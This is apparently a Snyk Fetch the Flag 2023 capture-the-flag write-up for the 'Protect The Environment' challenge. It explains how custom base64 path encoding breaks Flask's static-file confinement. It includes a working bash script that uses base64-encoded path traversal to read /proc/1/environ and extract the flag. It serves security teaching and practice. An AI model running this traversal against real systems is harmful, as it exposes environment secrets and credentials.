Snyk Fetch the Flag CTF 2023 writeup: Protect The Environment
November 30, 2023
0 mins readThanks for playing Fetch with us! Congrats to the thousands of players who joined us for Fetch the Flag CTF. If you were at Snyk’s 2023 Fetch the Flag and are looking for the answer to the Protect The Environment challenge, you’ve come to the right place. Let’s walk through the solution together!
The challenge uses a hand-rolled base64 encoding layer for paths. This seems fine, but it breaks Flask's ability to automatically chroot
static files. This is a file inclusion attack, but instead of including a file, you include the /proc/<pid>/environ
file. The user is not told or given any way to discover the PID, but this is not a problem since PID 1
works (or you can simply enumerate them and you'll get a hit on PID 8
, as that is what Gunicorn workers use).
#!/bin/bash
if [[ -z "$1" ]]
then
echo "IP address or hostname not specified"
exit 1
fi
if [[ -z "$2" ]]
then
echo "Port not specified"
exit 1
fi
curl -s http://$1:$2/`echo "assets/../../../../../../proc/1/environ" | base64` -o - | strings | grep -oE "flag{.*?}" --color=none
Thanks for making Fetch happen!
A huge thank you to all the teams in Fetch the Flag 2023! It was great seeing all of you there and you can always find me on YouTube.
Here are the writeups for the other 2023 challenges. Dig in!